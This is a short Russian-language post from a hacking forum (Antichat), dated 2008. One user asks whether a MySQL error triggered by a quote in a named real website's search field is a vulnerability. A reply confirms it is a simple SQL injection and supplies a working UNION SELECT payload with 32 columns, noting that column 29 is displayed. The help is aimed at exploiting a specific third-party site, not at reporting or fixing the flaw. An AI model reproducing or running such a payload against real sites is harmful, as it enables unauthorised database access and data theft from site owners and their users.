06.07.2008, 06:59
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от teen4jump
В поиске _http://investoru.info пишу '... вылазит:
'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and (hl_listings.expiration = 0 || date_a' at line 13'
Это уязвимость?
Да, простенькая инъекция, введи в поиске:
Код:
1') union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
29 поле выводится
__________________
Карфаген должен быть разрушен...
|
|
|